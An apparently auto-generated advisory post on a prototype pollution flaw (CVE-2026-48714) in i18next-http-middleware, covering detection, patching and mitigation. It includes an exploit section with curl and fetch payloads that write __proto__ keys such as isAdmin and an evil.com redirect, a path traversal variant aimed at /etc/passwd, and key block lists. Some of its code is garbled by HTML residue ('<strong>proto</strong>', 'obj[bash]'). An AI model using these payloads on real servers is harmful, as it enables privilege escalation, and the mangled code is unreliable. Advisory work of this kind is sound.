Listen to this Post
How CVE-2026-48714 Works
CVE-2026-48714 is a critical prototype pollution vulnerability affecting the `missingKeyHandler` in `i18next-http-middleware` versions prior to 3.9.7. The `i18next-http-middleware` is a popular middleware used with Node.js web frameworks like Express or Fastify, and also for Deno.
The vulnerability exists because the `missingKeyHandler` — which handles missing translation keys from incoming HTTP requests — blocks literal request-body keys such as __proto__, constructor, and `prototype` (a fix introduced in version 3.9.3). However, it fails to reject dotted variants of these keys, such as "__proto__.polluted".
When an application exposes the `missingKeyHandler` to untrusted input and uses `i18next-fs-backend` ≤ 2.6.5, the downstream backend splits the missing-key string on a configured `keySeparator` (default is .). These keys are then passed to an unguarded `setPath()` walker, which writes directly to Object.prototype. An attacker can send a POST request with a body like `{“__proto__.polluted”: “malicious”}` to pollute the global Object prototype.
This polluted prototype can then affect every plain object created subsequently in the Node.js process. The impact varies depending on the host application but can include crashes, corrupted translation behaviour, configuration poisoning, bypasses of property-based security checks, and even remote code execution (RCE) if chained with other vulnerabilities.
The vulnerability is exploitable remotely without authentication and has a CVSS v3 base score of 9.1 (Critical).
DailyCVE Form:
Platform: Node.js / Deno
Version: < 3.9.7
Vulnerability : Prototype Pollution
Severity: Critical (CVSS 9.1)
date: 2026-06-15
Prediction: 2026-06-22
What Undercode Say:
Analytics & Detection
To determine if your application is vulnerable, check your `package.json` for the affected versions:
Check i18next-http-middleware version npm list i18next-http-middleware Check i18next-fs-backend version npm list i18next-fs-backend
Exploitation Detection via Log Analysis
Monitor your application logs for suspicious `missingKeyHandler` requests containing prototype-polluting patterns:
Search for prototype pollution attempts in logs
grep -E '(<strong>proto</strong>|constructor|prototype).[a-zA-Z0-9_]+' /var/log/app/access.log
Detect requests with nested prototype keys
grep -E '{\s"<strong>proto</strong>"\s:\s{' /var/log/app/access.log
Runtime Detection Script
// Add this detection middleware before your i18next handler
app.use((req, res, next) => {
if (req.body && typeof req.body === 'object') {
const hasUnsafeKey = (obj, path = '') => {
for (const key of Object.keys(obj)) {
const fullPath = path ? `${path}.${key}` : key;
// Check for prototype-polluting patterns
if (key.includes('<strong>proto</strong>') || key.includes('constructor') || key.includes('prototype')) {
console.warn(<code>[bash] Blocked prototype pollution attempt: ${fullPath}</code>);
return true;
}
if (typeof obj[bash] === 'object' && obj[bash] !== null) {
if (hasUnsafeKey(obj[bash], fullPath)) return true;
}
}
return false;
};
if (hasUnsafeKey(req.body)) {
return res.status(400).json({ error: 'Invalid request payload' });
}
}
next();
});
Exploit:
Proof of Concept (PoC)
An attacker can send a POST request to the endpoint that triggers `missingKeyHandler` (typically a route that handles missing translation keys, e.g., `/locales/add` or a similar save-missing endpoint).
Exploit payload targeting <strong>proto</strong>.polluted
curl -X POST https://victim.com/locales/add \
-H "Content-Type: application/json" \
-d '{"<strong>proto</strong>.polluted": "malicious_value"}'
Alternative payload using nested object
curl -X POST https://victim.com/locales/add \
-H "Content-Type: application/json" \
-d '{"<strong>proto</strong>": {"isAdmin": true, "polluted": "payload"}}'
Path traversal variant (if using i18next-fs-backend)
curl -X POST https://victim.com/locales/add \
-H "Content-Type: application/json" \
-d '{"<strong>proto</strong>.config": "../../../etc/passwd"}'
Node.js Exploitation Script
// Attacker-controlled payload
const payload = {
"<strong>proto</strong>.isAdmin": true,
"<strong>proto</strong>.debug": "enabled",
"<strong>proto</strong>.redirect": "https://evil.com"
};
// Send via fetch
fetch('https://victim.com/api/missing-key', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(payload)
});
After successful exploitation, any subsequent object creation in the Node.js process will inherit the polluted properties:
// After pollution, this check passes for any user
if (user.isAdmin) { // true for all users!
grantAdminAccess();
}
Protection:
1. Upgrade to Patched Versions (Recommended)
Upgrade i18next-http-middleware to 3.9.7 or later npm install [email protected] Upgrade i18next-fs-backend to 2.6.6 or later npm install [email protected]
2. Input Validation Middleware
Add a request-body filter that rejects any top-level key containing __proto__, constructor, or `prototype` after splitting on your configured keySeparator:
const keySeparator = i18next.options.keySeparator || '.';
function hasUnsafeKeySegment(key) {
const segments = key.split(keySeparator);
return segments.some(seg =>
seg === '<strong>proto</strong>' ||
seg === 'constructor' ||
seg === 'prototype'
);
}
app.use((req, res, next) => {
if (req.body && typeof req.body === 'object') {
for (const key of Object.keys(req.body)) {
if (hasUnsafeKeySegment(key)) {
return res.status(400).json({ error: 'Invalid key detected' });
}
}
}
next();
});
3. Disable Missing-Key Persistence
If you cannot upgrade immediately, disable missing-key persistence when accepting writes from untrusted input:
i18next.init({
saveMissing: false, // Disable saving missing keys
// ... other options
});
4. Restrict Access
Do not expose `missingKeyHandler` to untrusted users. Mount it behind authentication or remove the route entirely.
5. WAF Rule
Add a Web Application Firewall (WAF) rule to reject requests containing __proto__, constructor, or `prototype` in request bodies or query parameters.
Impact:
- Prototype Pollution – A single unauthenticated request can pollute
Object.prototype, affecting every plain object created subsequently in the Node.js process. - Authorization Bypass – Polluted properties like `isAdmin` can break authorization checks, allowing privilege escalation.
- Denial of Service (DoS) – Type confusion from polluted objects can cause application crashes. Additionally, unbounded growth of `i18next.options.ns` can lead to memory and CPU exhaustion.
- Remote Code Execution (RCE) – Depending on downstream code that reads from polluted objects, this vulnerability can be chained into RCE.
- Path Traversal / SSRF – When paired with filesystem or HTTP backends, attacker-controlled `lng` and `ns` values can enable path traversal (e.g.,
../../etc/passwd) or Server-Side Request Forgery (SSRF). - Configuration Poisoning – Polluted prototype properties can alter application configuration, leading to unpredictable behaviour.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
